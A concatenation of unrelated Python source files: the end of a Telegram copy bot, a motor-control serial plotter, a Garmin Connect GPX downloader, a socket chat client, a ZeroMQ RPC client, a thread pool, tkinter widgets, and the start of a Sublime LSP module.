MessageHandler(Filters.text, _func.get_share_link),
],
_stage.IS_COVER_QUICK: [
# cover quick setting
CallbackQueryHandler(_func.modify_quick_in_db, pattern="cover_quick"),
CallbackQueryHandler(_func.cancel, pattern="not_cover_quick"),
MessageHandler(Filters.text, _func.cancel),
],
_stage.GET_DST: [
# request DST
CallbackQueryHandler(_copy.request_srcinfo),
],
_stage.COOK_ID: [
# request to COOK ID
MessageHandler(Filters.text, _size.size_handle),
],
_stage.REGEX_IN: [
# regex in choose mode
CallbackQueryHandler(_regex.regex_callback, pattern=r"quick|copy|size"),
],
_stage.REGEX_GET_DST: [
# regex copy end
CallbackQueryHandler(_regex.regex_copy_end),
],
_stage.COOK_FAV_TO_SIZE: [CallbackQueryHandler(_size.pre_cook_fav_to_size),],
_stage.COOK_FAV_PURGE: [CallbackQueryHandler(_purge.pre_to_purge),],
_stage.COOK_ID_DEDU: [CallbackQueryHandler(_dedupe.dedupe_mode),],
_stage.COOK_FAV_DEDU: [CallbackQueryHandler(_dedupe.dedupe_fav_mode),],
_stage.FAV_PRE_DEDU_INFO: [CallbackQueryHandler(_dedupe.pre_favdedu_info)],
},
fallbacks=[CommandHandler("cancel", _func.cancel)],
)
def stop_and_restart():
progress.terminate()
load.myclient.close()
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(update, context):
restart_msg = update.message.reply_text(load._text[load._lang]["is_restarting"])
restart_chat_id = restart_msg.chat_id
restart_msg_id = restart_msg.message_id
load.db_counters.update_one(
{"_id": "is_restart"},
{
"$set": {
"status": 1,
"chat_id": restart_chat_id,
"message_id": restart_msg_id,
}
},
True,
)
Thread(target=stop_and_restart).start()
dp.add_handler(conv_handler)
dp.add_handler(CommandHandler("start", _start.start))
dp.add_handler(CommandHandler("reset", _box.task_reset))
dp.add_handler(CommandHandler("kill", _func.taskill))
dp.add_handler(CommandHandler("ver", _func._version))
dp.add_handler(
CommandHandler(
"restart",
restart,
filters=Filters.user(user_id=int(load.cfg["tg"]["usr_id"])),
)
)
dp.add_error_handler(_func.error)
updater.start_polling()
logger.info("Fxxkr LAB iCopy " + __version__.__version__ + " Start")
updater.idle()
if __name__ == "__main__":
ns.x = 0
progress = _mp(target=_payload.task_buffer, args=(ns,))
progress.start()
#web = _mp(target=dash.dashboard)
#web.start()
main()
|
bldc_control.py
|
from tuw.Serial import *
from tuw.Figure import *
from matplotlib import pyplot as plt
import numpy as np
import string
import threading
import time
default_port='/dev/ttyACM0'
ser = MySerial(default_port)
def readPort(fig):
last = MyParam()
last.target = np.NaN
last.steering = 0
last.kp = np.NaN
last.ki = np.NaN
last.kd = np.NaN
while True :
line = ser.readline()
try:
if (line[0] == '$'):
if (line[1] == 's'):
values = line[2:]
words = string.split(values,",") # Fields split
if len(words) == 3:
current_pwm = float(words[0])
current_rps = float(words[1])
current_rps_target = float(words[2])
fig.set(current_pwm, current_rps, current_rps_target)
if(last.target != fig.param.target) :
last.target = fig.param.target
ser.writeline('t',last.target)
if(last.kp != fig.param.kp) :
last.kp = fig.param.kp
ser.writeline('p',last.kp)
if(last.ki != fig.param.ki) :
last.ki = fig.param.ki
ser.writeline('i',last.ki)
if(last.kd != fig.param.kd) :
last.kd = fig.param.kd
ser.writeline('d',last.kd)
if(last.steering != fig.param.steering) :
last.steering = fig.param.steering
ser.writeline('s',last.steering)
else :
print "cmd: " + line
else :
print "msg: " + line
except :
print "no msg" + line
def update(fig):
while True:
fig.plot()
time.sleep(0.01)
if __name__ == '__main__':
fig = plt.figure(FigureClass=MyFigure, figtitle='my title')
fig.init_gui()
t1 = threading.Thread(target=readPort,args=(fig, ))
t1.start()
t2 = threading.Thread(target=update,args=(fig, ))
t2.start()
plt.show()
|
garmin_sync.py
|
# -*- coding: utf-8 -*-
"""
Python 3 API wrapper for Garmin Connect to get your statistics.
Copy most code from https://github.com/cyberjunky/python-garminconnect
"""
import argparse
import json
import logging
import os
import time
import re
from threading import Thread
from enum import Enum, auto
import requests
from config import GPX_FOLDER, JSON_FILE, SQL_FILE
from utils import make_activities_file
GARMIN_COM_URL_DICT = {
"BASE_URL": "https://connect.garmin.com",
"SSO_URL_ORIGIN": "https://sso.garmin.com",
"SSO_URL": "https://sso.garmin.com/sso",
"MODERN_URL": "https://connect.garmin.com/modern",
"SIGNIN_URL": "https://sso.garmin.com/sso/signin",
"CSS_URL": "https://static.garmincdn.com/com.garmin.connect/ui/css/gauth-custom-v1.2-min.css",
}
GARMIN_CN_URL_DICT = {
"BASE_URL": "https://connect.garmin.cn",
"SSO_URL_ORIGIN": "https://sso.garmin.com",
"SSO_URL": "https://sso.garmin.cn/sso",
"MODERN_URL": "https://connect.garmin.cn/modern",
"SIGNIN_URL": "https://sso.garmin.cn/sso/signin",
"CSS_URL": "https://static.garmincdn.cn/cn.garmin.connect/ui/css/gauth-custom-v1.2-min.css",
}
class Garmin:
def __init__(self, email, password, is_CN=True):
"""
Init module
"""
self.email = email
self.password = password
self.req = requests.session()
self.logger = logging.getLogger(__name__)
self.display_name = ""
self.full_name = ""
self.unit_system = ""
self.URL_DICT = GARMIN_CN_URL_DICT if is_CN else GARMIN_COM_URL_DICT
MODERN_URL = self.URL_DICT.get("MODERN_URL")
self.url_user_summary = (
MODERN_URL + "/proxy/usersummary-service/usersummary/daily/"
)
self.url_user_summary_chart = (
MODERN_URL + "/proxy/wellness-service/wellness/dailySummaryChart/"
)
self.url_heartrates = (
MODERN_URL + "/proxy/wellness-service/wellness/dailyHeartRate/"
)
self.url_activities = (
MODERN_URL + "/proxy/activitylist-service/activities/search/activities"
)
self.url_exercise_sets = MODERN_URL + "/proxy/activity-service/activity/"
self.url_tcx_download = (
MODERN_URL + "/proxy/download-service/export/tcx/activity/"
)
self.url_gpx_download = (
MODERN_URL + "/proxy/download-service/export/gpx/activity/"
)
self.url_fit_download = MODERN_URL + "/proxy/download-service/files/activity/"
self.url_csv_download = (
MODERN_URL + "/proxy/download-service/export/csv/activity/"
)
self.url_device_list = (
MODERN_URL + "/proxy/device-service/deviceregistration/devices"
)
self.url_device_settings = (
MODERN_URL + "/proxy/device-service/deviceservice/device-info/settings/"
)
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36",
"origin": self.URL_DICT.get("SSO_URL_ORIGIN"),
}
def login(self):
"""
Login to portal
"""
params = {
"webhost": self.URL_DICT.get("BASE_URL"),
"service": self.URL_DICT.get("MODERN_URL"),
"source": self.URL_DICT.get("SIGNIN_URL"),
"redirectAfterAccountLoginUrl": self.URL_DICT.get("MODERN_URL"),
"redirectAfterAccountCreationUrl": self.URL_DICT.get("MODERN_URL"),
"gauthHost": self.URL_DICT.get("SSO_URL"),
"locale": "en_US",
"id": "gauth-widget",
"cssUrl": self.URL_DICT.get("CSS_URL"),
"clientId": "GarminConnect",
"rememberMeShown": "true",
"rememberMeChecked": "false",
"createAccountShown": "true",
"openCreateAccount": "false",
"usernameShown": "false",
"displayNameShown": "false",
"consumeServiceTicket": "false",
"initialFocus": "true",
"embedWidget": "false",
"generateExtraServiceTicket": "false",
}
data = {
"username": self.email,
"password": self.password,
"embed": "true",
"lt": "e1s1",
"_eventId": "submit",
"displayNameRequired": "false",
}
try:
response = self.req.post(
self.URL_DICT.get("SIGNIN_URL"),
headers=self.headers,
params=params,
data=data,
)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
response.raise_for_status()
self.logger.debug("Login response code %s", response.status_code)
except requests.exceptions.HTTPError as err:
raise GarminConnectConnectionError("Error connecting") from err
self.logger.debug("Response is %s", response.text)
response_url = re.search(r'"(https:[^"]+?ticket=[^"]+)"', response.text)
if not response_url:
raise GarminConnectAuthenticationError("Authentication error")
response_url = re.sub(r"\\", "", response_url.group(1))
self.logger.debug("Fetching profile info using found response url")
try:
response = self.req.get(response_url)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
response.raise_for_status()
except requests.exceptions.HTTPError as err:
raise GarminConnectConnectionError("Error connecting") from err
self.user_prefs = self.parse_json(response.text, "VIEWER_USERPREFERENCES")
self.unit_system = self.user_prefs["measurementSystem"]
self.social_profile = self.parse_json(response.text, "VIEWER_SOCIAL_PROFILE")
self.display_name = self.social_profile["displayName"]
self.full_name = self.social_profile["fullName"]
def parse_json(self, html, key):
"""
Find and return json data
"""
found = re.search(key + r" = JSON.parse\(\"(.*)\"\);", html, re.M)
if found:
text = found.group(1).replace('\\"', '"')
return json.loads(text)
def fetch_data(self, url):
"""
Fetch and return data
"""
try:
response = self.req.get(url, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
self.logger.debug("Fetch response code %s", response.status_code)
response.raise_for_status()
except requests.exceptions.HTTPError as err:
self.logger.debug(
"Exception occurred during data retrieval - perhaps session expired - trying relogin: %s"
% err
)
self.login()
try:
response = self.req.get(url, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
self.logger.debug("Fetch response code %s", response.status_code)
response.raise_for_status()
except requests.exceptions.HTTPError as err:
self.logger.debug(
"Exception occurred during data retrieval, relogin without effect: %s"
% err
)
raise GarminConnectConnectionError("Error connecting") from err
resp_json = response.json()
self.logger.debug("Fetch response json %s", resp_json)
return resp_json
def get_full_name(self):
"""
Return full name
"""
return self.full_name
def get_unit_system(self):
"""
Return unit system
"""
return self.unit_system
def get_stats_and_body(self, cdate):
"""
Return activity data and body composition
"""
return {
**self.get_stats(cdate),
**self.get_body_composition(cdate)["totalAverage"],
}
def get_stats(self, cdate): # cdate = 'YYYY-mm-dd'
"""
Fetch available activity data
"""
summaryurl = (
self.url_user_summary + self.display_name + "?" + "calendarDate=" + cdate
)
self.logger.debug("Fetching statistics %s", summaryurl)
try:
response = self.req.get(summaryurl, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
self.logger.debug("Statistics response code %s", response.status_code)
response.raise_for_status()
except requests.exceptions.HTTPError as err:
raise GarminConnectConnectionError("Error connecting") from err
resp_json = response.json()
if resp_json["privacyProtected"] is True:
self.logger.debug("Session expired - trying relogin")
self.login()
try:
response = self.req.get(summaryurl, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
self.logger.debug("Statistics response code %s", response.status_code)
response.raise_for_status()
except requests.exceptions.HTTPError as err:
self.logger.debug(
"Exception occurred during statistics retrieval, relogin without effect: %s"
% err
)
raise GarminConnectConnectionError("Error connecting") from err
else:
resp_json = response.json()
return resp_json
def get_activities(self, start, limit):
"""
Fetch available activities
"""
activitiesurl = (
self.url_activities + "?start=" + str(start) + "&limit=" + str(limit)
)
return self.fetch_data(activitiesurl)
def get_excercise_sets(self, activity_id):
activity_id = str(activity_id)
exercisesetsurl = f"{self.url_exercise_sets}{activity_id}/exerciseSets"
self.logger.debug(f"Fetching exercise sets for activity_id {activity_id}")
return self.fetch_data(exercisesetsurl)
class ActivityDownloadFormat(Enum):
ORIGINAL = auto()
TCX = auto()
GPX = auto()
CSV = auto()
def download_activity(self, activity_id, dl_fmt=ActivityDownloadFormat.TCX):
"""
Download the activity in the requested format and return the raw bytes. For
"ORIGINAL" this returns the zip file content; it is up to the caller to extract it.
"CSV" returns a csv of the splits.
"""
activity_id = str(activity_id)
urls = {
Garmin.ActivityDownloadFormat.ORIGINAL: f"{self.url_fit_download}{activity_id}",
Garmin.ActivityDownloadFormat.TCX: f"{self.url_tcx_download}{activity_id}",
Garmin.ActivityDownloadFormat.GPX: f"{self.url_gpx_download}{activity_id}",
Garmin.ActivityDownloadFormat.CSV: f"{self.url_csv_download}{activity_id}",
}
if dl_fmt not in urls:
raise ValueError(f"Unexpected value {dl_fmt} for dl_fmt")
url = urls[dl_fmt]
self.logger.debug(f"Downloading from {url}")
try:
response = self.req.get(url, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
except requests.exceptions.HTTPError as err:
raise GarminConnectConnectionError("Error connecting") from err
return response.content
class GarminConnectConnectionError(Exception):
"""Raised when communication ended in error."""
def __init__(self, status):
"""Initialize."""
super(GarminConnectConnectionError, self).__init__(status)
self.status = status
class GarminConnectTooManyRequestsError(Exception):
"""Raised when rate limit is exceeded."""
def __init__(self, status):
"""Initialize."""
super(GarminConnectTooManyRequestsError, self).__init__(status)
self.status = status
class GarminConnectAuthenticationError(Exception):
"""Raised when login returns wrong result."""
def __init__(self, status):
"""Initialize."""
super(GarminConnectAuthenticationError, self).__init__(status)
self.status = status
def download_garmin_gpx(client, activity_id):
try:
gpx_data = client.download_activity(
activity_id, dl_fmt=client.ActivityDownloadFormat.GPX
)
file_path = os.path.join(GPX_FOLDER, activity_id + ".gpx")
with open(file_path, "wb") as fb:
fb.write(gpx_data)
except Exception:
print(f"failed to download gpx for activity {activity_id}")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("email", help="email of garmin")
parser.add_argument("password", help="password of garmin")
parser.add_argument(
"--is-cn",
dest="is_cn",
action="store_true",
help="if garmin accout is com",
)
options = parser.parse_args()
client = Garmin(options.email, options.password, options.is_cn)
client.login()
limit, start = 100, 0
count = 0
# Because no parameter was found to filter activities by time, the Garmin activity id
# is used as the gpx filename to work out which new runs still need to be generated.
old_garmin_ids = os.listdir(GPX_FOLDER)
old_garmin_ids = [i.split(".")[0] for i in old_garmin_ids]
api_garmin_ids = []
while True:
activities = client.get_activities(start, limit)
for a in activities:
if a.get("activityId") is None:
print("Skipping activity without id")
continue
api_garmin_ids.append(str(a.get("activityId")))
activities_count = len(activities)
count += activities_count
print(f"parsing from {start} to {count}")
start += 100
# tricky break
if activities_count != limit:
break
to_generate_garmin_ids = list(set(api_garmin_ids) - set(old_garmin_ids))
print(f"{len(to_generate_garmin_ids)} new runs to generate")
start_time = time.time()
threads = []
for i in to_generate_garmin_ids:
t = Thread(target=download_garmin_gpx, args=(client, i))
threads.append(t)
t.start()
for thread in threads:
thread.join()
print(f"cost {time.time()-start_time} s for gpx")
time.sleep(60) # waiting
make_activities_file(SQL_FILE, GPX_FOLDER, JSON_FILE)
|
client.py
|
import socket
import threading
import os
import signal
from sys import platform
import sys
import base64
class clientType:
PORT = 5050
DISCONNECT_MESSAGE = "exit"
passkey = ''
IP = ''
username = ''
client = ''
def __init__(self):
if platform == "linux" or platform == "linux2" or platform == "darwin":
os.system('clear')
elif platform == "win32":
os.system('cls')
else:
print('Unsupported OS')
exit(1)
self.passkey = sys.argv[1]
self.IP = self.decode_key(self.passkey)
self.mainFunc()
def getName(self):
self.username = input("Enter your username: ")
while not self.username.isalpha():
print(" \n \t ERROR: The username should only contain alphabates. \n")
self.username = input('Re-enter your username : ')
def decode_key(self, valu):
try:
decoded_data = base64.b64decode(valu)
dec_ip = decoded_data.decode('utf-8')
if len(dec_ip) == 8:
dec_ip = '192.168' + dec_ip.lstrip('0')
elif len(dec_ip) == 15:
dec_ip = dec_ip.lstrip('0')
elif len(dec_ip) == 0:
print("Please enter a passkey \n ")
self.passkey = input(" Re-enter your accesskey : ")
dec_ip = self.decode_key(self.passkey)
else:
print("Please enter the correct passkey \n ")
self.passkey = input(" Re-enter your accesskey : ")
dec_ip = self.decode_key(self.passkey)
except (ConnectionRefusedError, UnicodeDecodeError, UnboundLocalError, base64.binascii.Error):
print("Please enter the correct passkey \n ")
self.passkey = input(" Re-enter your accesskey : ")
dec_ip = self.decode_key(self.passkey)
finally:
return dec_ip
def receive(self):
while True:
try:
message = self.client.recv(1024).decode('utf-8')
if message == 'Connect':
self.client.send(self.username.encode('utf-8'))
elif message == 'Server left':
print('\nServer has disconnected\n')
os._exit(0)
elif message.startswith("image:"):
fname,fsize = message[7:].split()
fpath='Proximity_images'
if not os.path.exists(fpath):
os.mkdir(fpath)
fsize = int(fsize)
c=0
k=(fsize//512)*512
fname1 = fpath+'/'+fname
try:
with open(fname1,"wb") as f:
while True:
chunk=self.client.recv(512)
if not chunk:
break
f.write(chunk)
c+=512
if c==k:
break
if fsize-k:
chunk=self.client.recv(fsize-k+1)
f.write(chunk)
print(f"[{self.username} : Sent {fname}]")
except:
print("An error occured!")
elif 'Connected to' in message:
print('\n \t ', message, '\n')
elif 'Username updated to [' in message:
print(message)
self.username = message[25:-1]
elif message.startswith("file:"):
filename, filesize = message[5:].split(";")
# remove absolute path if there is
filename = os.path.basename(filename)
# convert to integer
filesize = int(filesize)
if not os.path.exists('Proximity_files'):
os.mkdir('Proximity_files')
filename = os.path.join('Proximity_files', filename)
with open(filename, "wb") as f:
bytes_read = self.client.recv(filesize)
f.write(bytes_read)
else:
print('\t\t\t\t', message)
except:
print("An error occured!")
self.client.close()
break
def write(self):
while True:
try:
input_val = input()
if input_val == self.DISCONNECT_MESSAGE:
self.client.send(self.DISCONNECT_MESSAGE.encode('utf-8'))
self.client.close()
print('You will be disconnected')
os._exit(0)
elif input_val.startswith("image:"):
fname = input_val.split()[1]
fsize = os.path.getsize(fname)
iname=os.path.basename(fname)
message='image: '+iname+' '+str(fsize)
self.client.send(message.encode('utf-8'))
k=(fsize//512)*512
c=0
try:
with open(fname,"rb") as f:
while True:
chunks = f.read(512)
if not chunks:
break
c+=512
self.client.send(chunks)
if c==k:
break
if fsize-k:
chunks=f.read(fsize-k+1)
self.client.send(chunks)
print(f'Sent {fname} successfully')
except:
print("An error occured!")
elif input_val.startswith("file:"):
filename=input_val[5:]
filesize=os.path.getsize("Proximity_files/Client/"+filename)
message = input_val+";"+str(filesize)
self.client.send(message.encode('utf-8'))
with open(("Proximity_files/Client/"+filename), "rb") as f:
bytes_read = f.read(filesize)
self.client.send(bytes_read)
print("File sent")
else:
message = '[{}] : {}'.format(self.username, input_val)
self.client.send(message.encode('utf-8'))
except:
print('\n \t Error occurred while reading input \n')
self.client.send(self.DISCONNECT_MESSAGE.encode('utf-8'))
self.client.close()
print('You will be disconnected')
os._exit(0)
def keyboardInterruptHandler(self, signal, frame):
print('Interrupted')
self.client.send(self.DISCONNECT_MESSAGE.encode('utf-8'))
self.client.close()
print('You will be disconnected')
os._exit(0)
def mainFunc(self):
self.getName()
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.IP, self.PORT))
signal.signal(signal.SIGINT, self.keyboardInterruptHandler)
receive_thread = threading.Thread(target=self.receive)
receive_thread.start()
write_thread = threading.Thread(target=self.write)
write_thread.start()
c1 = clientType()
|
client.py
|
import threading
from datetime import datetime
from functools import lru_cache
from typing import Any
import zmq
from zmq.backend.cython.constants import NOBLOCK
from .common import HEARTBEAT_TOPIC, HEARTBEAT_TOLERANCE
class RemoteException(Exception):
"""
RPC remote exception
"""
def __init__(self, value: Any):
"""
Constructor
"""
self._value = value
def __str__(self):
"""
Output error message
"""
return self._value
class RpcClient:
""""""
def __init__(self):
"""Constructor"""
# zmq port related
self._context: zmq.Context = zmq.Context()
# Request socket (Request–reply pattern)
self._socket_req: zmq.Socket = self._context.socket(zmq.REQ)
# Subscribe socket (Publish–subscribe pattern)
self._socket_sub: zmq.Socket = self._context.socket(zmq.SUB)
# Worker thread related, used to process data pushed from the server
self._active: bool = False # RpcClient status
self._thread: threading.Thread = None # RpcClient thread
self._lock: threading.Lock = threading.Lock()
self._last_received_ping: datetime = datetime.utcnow()
@lru_cache(100)
def __getattr__(self, name: str):
"""
Realize remote call function
"""
# Perform remote call task
def dorpc(*args, **kwargs):
# Get timeout value from kwargs, default value is 30 seconds
if "timeout" in kwargs:
timeout = kwargs.pop("timeout")
else:
timeout = 30000
# Generate request
req = [name, args, kwargs]
# Send request and wait for response
with self._lock:
self._socket_req.send_pyobj(req)
# Timeout reached without any data
n = self._socket_req.poll(timeout)
if not n:
msg = f"Timeout of {timeout}ms reached for {req}"
raise RemoteException(msg)
rep = self._socket_req.recv_pyobj()
# Return the response if the call succeeded; raise an exception if it failed
if rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
def start(
self,
req_address: str,
sub_address: str
) -> None:
"""
Start RpcClient
"""
if self._active:
return
# Connect zmq port
self._socket_req.connect(req_address)
self._socket_sub.connect(sub_address)
# Start RpcClient status
self._active = True
# Start RpcClient thread
self._thread = threading.Thread(target=self.run)
self._thread.start()
self._last_received_ping = datetime.utcnow()
def stop(self) -> None:
"""
Stop RpcClient
"""
if not self._active:
return
# Stop RpcClient status
self._active = False
def join(self) -> None:
# Wait for RpcClient thread to exit
if self._thread and self._thread.is_alive():
self._thread.join()
self._thread = None
def run(self) -> None:
"""
Run RpcClient function
"""
pull_tolerance = HEARTBEAT_TOLERANCE * 1000
while self._active:
if not self._socket_sub.poll(pull_tolerance):
self.on_disconnected()
continue
# Receive data from subscribe socket
topic, data = self._socket_sub.recv_pyobj(flags=NOBLOCK)
if topic == HEARTBEAT_TOPIC:
self._last_received_ping = data
else:
# Process data by callable function
self.callback(topic, data)
# Close socket
self._socket_req.close()
self._socket_sub.close()
def callback(self, topic: str, data: Any) -> None:
"""
Callable function
"""
raise NotImplementedError
def subscribe_topic(self, topic: str) -> None:
"""
Subscribe data
"""
self._socket_sub.setsockopt_string(zmq.SUBSCRIBE, topic)
def on_disconnected(self):
"""
Callback when heartbeat is lost.
"""
msg = f"RpcServer has no response over {HEARTBEAT_TOLERANCE} seconds, please check you connection."
print(msg)
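# Minimal usage sketch (not part of the original module): a concrete client that just
# prints everything pushed from the server. The tcp endpoints below are assumptions;
# use whatever addresses your RpcServer binds for its REP and PUB sockets.
class PrintingRpcClient(RpcClient):
    def callback(self, topic: str, data: Any) -> None:
        # Handle data pushed on the subscribe socket.
        print(f"{topic}: {data}")


if __name__ == "__main__":
    client = PrintingRpcClient()
    client.subscribe_topic("")  # an empty prefix subscribes to every topic
    client.start("tcp://127.0.0.1:2014", "tcp://127.0.0.1:4102")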
|
recipe-576910.py
|
#! /usr/bin/python
import threading
import queue
import time
import sys
Instance = None
def getInstance():
global Instance
if not Instance:
Instance = ThreadPool()
return Instance
class ThreadPool:
def __init__(self,maxWorkers = 10):
self.tasks = queue.Queue()
self.workers = 0
self.working = 0
self.maxWorkers = maxWorkers
self.allKilled = threading.Event()
self.countLock = threading.RLock()
self.timers = {}
self.timersLock = threading.Lock()
self.timersThreadLock = threading.Lock()
self.timersEvent = threading.Event()
self.allKilled.set()
def run(self,target,callback = None, *args, **kargs):
""" starts task.
target = callable to run with *args and **kargs arguments.
callback = callable executed when target ends
callback should accept one parameter where target's
return value is passed.
If callback is None it's ignored.
"""
self.countLock.acquire()
if not self.workers:
self.addWorker()
self.countLock.release()
self.tasks.put((target,callback,args,kargs))
def setMaxWorkers(self,num):
""" Sets the maximum workers to create.
num = max workers
If number passed is lower than active workers
it will kill workers to match that number.
"""
self.countLock.acquire()
self.maxWorkers = num
if self.workers > self.maxWorkers:
self.killWorker(self.workers - self.maxWorkers)
self.countLock.release()
def addWorker(self,num = 1):
""" Add workers.
num = number of workers to create/add.
"""
for x in range(num):
self.countLock.acquire()
self.workers += 1
self.allKilled.clear()
self.countLock.release()
t = threading.Thread(target = self.__workerThread)
t.daemon = True
t.start()
def killWorker(self,num = 1):
""" Kill workers.
num = number of workers to kill.
"""
self.countLock.acquire()
if num > self.workers:
num = self.workers
self.countLock.release()
for x in range(num):
self.tasks.put("exit")
def killAllWorkers(self,wait = None):
""" Kill all active workers.
wait = seconds to wait until last worker ends
if None it waits forever.
"""
self.countLock.acquire()
self.killWorker(self.workers)
self.countLock.release()
self.allKilled.wait(wait)
def __workerThread(self):
while True:
task = self.tasks.get()
# exit is "special" tasks to kill thread
if task == "exit":
break
self.countLock.acquire()
self.working += 1
if (self.working >= self.workers) and (self.workers < self.maxWorkers): # create thread on demand
self.addWorker()
self.countLock.release()
fun,cb,args,kargs = task
try:
ret = fun(*args,**kargs)
if cb:
cb(ret)
except:
print("Unexpected error:", sys.exc_info())
self.countLock.acquire()
self.working -= 1
self.countLock.release()
self.countLock.acquire()
self.workers -= 1
if not self.workers:
self.allKilled.set()
self.countLock.release()
def timer(self, cb, period):
""" Add or remove timers.
cb = callback function.
period = period in seconds (float)
if period is 0 timer is deleted.
"""
self.run(self.__timerThread, None, cb, period)
def __timerThread(self, cb, period):
self.timersLock.acquire()
self.timersEvent.set()
if not period:
if cb in self.timers:
del(self.timers[cb])
self.timersLock.release()
return
self.timers[cb] = [period,time.time()]
self.timersLock.release()
if not self.timersThreadLock.acquire(0):
return
while True:
self.timersLock.acquire()
if len(self.timers) == 0:
self.timersThreadLock.release()
self.timersLock.release()
break
minWait = 30*24*3600
now = time.time()
for k,v in list(self.timers.items()):
period, last = v
wait = period - (now - last)
if wait <=0:
self.run(k)
wait = period
v[1] = now
if wait < minWait:
minWait = wait
self.timersLock.release()
self.timersEvent.wait(minWait)
self.timersEvent.clear()
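# Minimal usage sketch (not part of the original recipe): submit a few tasks to the
# shared pool and wait for the workers to drain. The work() function and the timings
# are made up for illustration.
if __name__ == "__main__":
    def work(n):
        time.sleep(0.1)
        return n * n

    pool = getInstance()
    for i in range(5):
        pool.run(work, lambda result: print("result:", result), i)
    time.sleep(1)            # give the queued tasks time to finish
    pool.killAllWorkers(5)   # ask the workers to exit and wait up to 5 seconds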
|
_entry.py
|
from tkinter import *
from center_tk import Center_root
from tkinter.scrolledtext import ScrolledText
import os, threading, time
from tkinter import ttk
class _entry(Entry) :
def __init__(self , parent , *args , **kwargs):
Entry.__init__(self , parent , *args , **kwargs)
self.pop = Menu(self ,tearoff =0 )
self.pop.add_command(label = "Cut\t\t", command = self.Cut)
self.pop.add_command(label = "Copy\t\t", command = self.Copy)
self.pop.add_command(label = "Paste\t\t", command = self.Paste)
self.bind('<Button-3>' , self.pop2)
def pop2(self, e):
try:
self.pop.tk_popup(e.x_root , e.y_root , 0)
finally :
self.pop.grab_release()
def Copy(self):
self.event_generate("<<Copy>>")
def Paste(self):
self.event_generate("<<Paste>>")
def Cut(self):
self.event_generate("<<Cut>>")
class _text(Text) :
def __init__(self , parent , *args , **kwargs):
Text.__init__(self , parent , *args , **kwargs)
self.pop = Menu(self ,tearoff =0 )
self.pop.add_command(label = "Cut\t\t", command = self.Cut)
self.pop.add_command(label = "Copy\t\t", command = self.Copy)
self.pop.add_command(label = "Paste\t\t", command = self.Paste)
self.bind('<Button-3>' , self.pop2)
def pop2(self, e):
try:
self.pop.tk_popup(e.x_root , e.y_root , 0)
finally :
self.pop.grab_release()
def Copy(self):
self.event_generate("<<Copy>>")
def Paste(self):
self.event_generate("<<Paste>>")
def Cut(self):
self.event_generate("<<Cut>>")
class scroll_text(ScrolledText) :
def __init__(self , parent , *args , **kwargs):
ScrolledText.__init__(self , parent , *args , **kwargs)
self.pop = Menu(self ,tearoff =0 )
self.pop.add_command(label = "Cut\t\t", command = self.Cut , image =None
, compound = 'left')
self.pop.add_command(label = "Copy\t\t", command = self.Copy , image =None
, compound = 'left')
self.pop.add_command(label = "Paste\t\t", command = self.Paste , image =None
, compound = 'left')
self.bind('<Button-3>' , self.pop2)
def pop2(self, e):
try:
self.pop.tk_popup(e.x_root , e.y_root , 0)
finally :
self.pop.grab_release()
def Copy(self):
self.event_generate("<<Copy>>")
def Paste(self):
self.event_generate("<<Paste>>")
def Cut(self):
self.event_generate("<<Cut>>")
class Check_path :
def __init__(self , label , Entry):
self.label = label
self.Entry = Entry
self.Thread = threading.Thread(target = self.curr, daemon = True)
self.Thread.start()
def exists(self,event):
state = os.path.exists(self.Entry.get())
if state :
self.label['text'] = 'The path exists'
self.label['foreground'] = '#00A600'
else :
self.label['text'] = 'The path does not exist'
self.label['foreground'] = 'red'
def curr(self):
try:
while True:
if len(self.Entry.get()) > 5 :
self.Entry.bind("<Key>" , self.exists)
elif len(self.Entry.get()) == 0 :
self.label['text'] = 'Please insert a document path!'
self.label['foreground'] = '#000'
time.sleep(0.1) # avoid busy-waiting while polling the entry widget
except :
pass
if __name__ == '__main__':
root = Tk()
show = Label(text = 'Please insert a document path!')
show.pack()
get_path = _entry(root , width = 40)
exists = Check_path(label = show , Entry = get_path)
center_ = Center_root(master = root, geometry =(300 , 50))
get_path.pack()
root.mainloop()
|
windows.py
|
from ...third_party import WebsocketServer # type: ignore
from .configurations import ConfigManager
from .configurations import WindowConfigManager
from .diagnostics import ensure_diagnostics_panel
from .logging import debug
from .logging import exception_log
from .message_request_handler import MessageRequestHandler
from .panels import log_server_message
from .promise import Promise
from .protocol import Diagnostic
from .protocol import DiagnosticSeverity
from .protocol import DocumentUri
from .protocol import Error
from .protocol import Location
from .sessions import get_plugin
from .sessions import Logger
from .sessions import Manager
from .sessions import Session
from .sessions import SessionBufferProtocol
from .sessions import SessionViewProtocol
from .settings import userprefs
from .transports import create_transport
from .types import ClientConfig
from .types import matches_pattern
from .typing import Optional, Any, Dict, Deque, List, Generator, Tuple, Iterable, Sequence, Union
from .url import parse_uri
from .views import extract_variables
from .views import make_link
from .workspace import ProjectFolders
from .workspace import sorted_workspace_folders
from abc import ABCMeta
from abc import abstractmethod
from collections import deque
from subprocess import CalledProcessError
from time import time
from weakref import ref
from weakref import WeakSet
import functools
import json
import sublime
import threading
import urllib.parse
_NO_DIAGNOSTICS_PLACEHOLDER = " No diagnostics. Well done!"
class AbstractViewListener(metaclass=ABCMeta):
TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY = "lsp_total_errors_and_warnings"
view = None # type: sublime.View
@abstractmethod
def session_async(self, capability_path: str, point: Optional[int] = None) -> Optional[Session]:
raise NotImplementedError()
@abstractmethod
def sessions_async(self, capability_path: Optional[str] = None) -> Generator[Session, None, None]:
raise NotImplementedError()
@abstractmethod
def session_views_async(self) -> Iterable[SessionViewProtocol]:
raise NotImplementedError()
@abstractmethod
def on_session_initialized_async(self, session: Session) -> None:
